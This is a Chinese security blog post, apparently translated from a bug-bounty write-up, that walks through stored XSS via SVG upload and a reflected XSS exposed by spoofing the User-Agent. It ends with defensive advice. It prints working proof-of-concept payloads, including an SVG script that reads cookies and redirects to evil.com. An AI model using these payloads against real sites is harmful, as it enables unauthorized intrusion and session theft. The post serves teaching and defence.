未知技术大揭秘,让XSS漏洞无处遁形!0x2
2024-9-9 23:4:44 Author: mp.weixin.qq.com(查看原文) 阅读量:12 收藏

forever young

不论昨天如何,都希望新的一天里,我们大家都能成为更好的人,也希望我们都是走向幸福的那些人

01

通过SVG文件上传的存储型XSS

安全小白团

书接上回《未知技术大揭秘,让XSS漏洞无处遁形!0x1

关键词:文件上传——手动测试。

在完成信息收集后,我查找了aquatone的结果,然后我发现了一个有趣的子域。

URL xxx 是我们的目标。当你开始对一个目标进行测试时,您必须了解目标的所有功能,例如注册、登录、忘记密码等等。

我尝试在注册表单上创建帐户时,我发现需要填写一些内容,例如用户名、电子邮件、密码、组织名称。

让我们在用户名输入中添加一个有效负载,例如

"> < img  src = x  onerror = alert(document.domain) > {{7*7}}'
如果您查找之前的有效负载,您会发现它正在测试不同的漏洞,例如: img 标签用于测试 XSS {{7*7}} 用于测试 SSTI' 用于测试 SQLi

我们无法确定它是否存在漏洞,除非我们填写完所有空的输入项。但是因为用户名对恶意输入有防护措施,因此我无法直接输入。那么我们可以使用不同的技术来绕过这种防护,例如修改有效负载、对内容进行编码等。不过,先让我们看看所有输入项是否都具有相同的防护机制。在组织字段中需要填写多项内容,例如组织名称、地址、国家/地区等。当我将有效负载添加到组织名称时,我们需要观察系统的响应。

我们的 XSS 负载被接受并且成功执行了。

好吧,我没有就此停止,因为还有很多东西需要测试,但我会重点关注关系表单中的文件上传功能字段。

文件上传漏洞:当网站允许用户上传文件而未对输入进行适当验证或清理时,就会发生文件上传漏洞。这可能导致包括执行恶意脚本或上传可能危及系统安全或窃取敏感信息的有害文件在内的各种安全问题。

什么是 SVG:可缩放矢量图形 (SVG) 是一种基于 XML 的矢量图像格式,可以包含交互式图形和动画图形。SVG 文件还可以包含 JavaScript 代码,可用于各种任务,包括动画。由于 SVG 文件可以被视为 HTML 中的图像,因此可以将它们放置在图像标签中并完美呈现,例如:

<img src="rectangle.svg" alt="Rectangle" height="20" width="30">

SVG文件( "rectangle.svg")可以类似于以下内容

<svg width="200" height="100" xmlns="http://www.w3.org/2000/svg">  <rect x="20" y="20" width="160" height="60" fill="blue" /></svg><!-->用于创建蓝色矩形的 SVG 文件<-->

我能够上传包含恶意脚本的SVG文件,但该脚本没有被正确清理,从而导致脚本执行。

这是我创建的恶意 SVG文件。

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />   <script type="text/javascript">      alert("You have been hacked !! " + "\n" + "Domain: " + document.domain + "\n" + "Cookie: " + document.cookie );      window.location.href="https://evil.com"</script></svg>

我们来上传吧。

上传,我们将收到存储型 XSS。

我详细报告了该漏洞,并且已被接受。

02

未知技术的XSS

安全小白团

关键字:robots.txt — User-agent — Burp Suite。

假设我们有一个目标网站 https://targets.com。我做了一下信息收集,但只找到了一个页面,该页面返回了一个内部错误,没有什么重要信息。当我进行模糊测试时,除了以下robots.txt 文件,没有发现其他内容:

如果你是一名CTF玩家或者之前玩过CTF ,那么你的脑海中通常会出现以下想法:如果我转到/settings 页面并将请求中的用户代理替换为响应中看到的值,会发生什么?

当我用Burp Suite拦截请求并将User-Agent 更改为Mediapartners-Google时,我并没有在/settings页面发现什么,但我发现了许多可接受的页面,这表明我们现在有了一个全新的完整Web应用程序。我没想到会是这样,我感到很惊讶。

就像我们处理的大多数目标一样。手动和自动方法是我们的关键。在运行Burp Suite 扫描后,我发现了一些有用的结果,其中之一是XSS 漏洞。以下是我发现的漏洞的所有详细信息。

进入Burp Suite:-> 代理 -> 拦截

转到拦截中的选项。

转到“匹配并替换”,然后将User-agent替换为新的(Mediapartners-Google),以拦截所有使用它的请求。

访问我们的易受攻击的 URL 

https://targets.com//bundle/cardjdv1i”><script>alert(document.cookie)</script>mnybm?id=25020×tamp=1704865352 

我们得到了XSS。

当我再次更改用户代理以确认错误配置来自它时,我没有得到任何信息,因此是时候报告我们的漏洞了。

查找以下代码以了解可能发生的情况:

// 这只是一个简单的Java Script代码示例,而不是实际代码<html>  <body>    <p>This <span id="exampleElement"></span></p>  </body>  <script>    // Get the User-Agent value from the request    var userAgent = navigator.userAgent;        // Check if the User-Agent value is "Mediapartners-Google"    if (userAgent.indexOf("Mediapartners-Google") !== -1) {      // Assuming the URL is https://targets.com/bundle/<user-input>/      var userInput = window.location.pathname.split("/")[2];      document.getElementById("exampleElement").innerHTML = userInput;    }</script></html>
当我报告这个漏洞时,它没有被接受,因为子域名不在范围内,但我并不在意,因为这是一个未知的技术,而且我想告诉你的是,你不能忽视你得到的任何线索。

03

如何防范XSS漏洞

安全小白团

1. 验证和清理输入:始终验证和清理用户输入,以防止注入恶意脚本。

2. 使用内容安全策略 (CSP):CSP 是一项安全功能,有助于防止跨站点脚本和其他代码注入攻击。

3. 输出编码:在输出用户提供的数据时,对其进行编码,以防止浏览器将其解释为HTML。

4. 部署WAF(Web应用防火墙):WAF可以帮助过滤恶意请求并防止XSS攻击。

如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

ssrf绕过新思路

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips

参考及来源:

https://infosecwriteups.com/how-i-found-multiple-xss-vulnerabilities-using-unknown-techniques-74f8e705ea0d

04

免责&版权声明

安全小白团

安全小白团是帮助用户了解信息安全技术、安全漏洞相关信息的微信公众号。安全小白团提供的程序(方法)可能带有攻击性,仅供安全研究与教学之用,用户将其信息做其他用途,由用户承担全部法律及连带责任,安全小白团不承担任何法律及连带责任。欢迎大家转载,转载请注明出处。如有侵权烦请告知,我们会立即删除并致歉。谢谢!

转发

收藏

点赞

在看


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247495853&idx=1&sn=e2491623e5caefdaadabfac23ad5bc2d&chksm=e8a5facedfd273d8d8340e0b90ab9c7265716809d4e8ea68ffb32aac1ec4a8e16400cd77e295&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh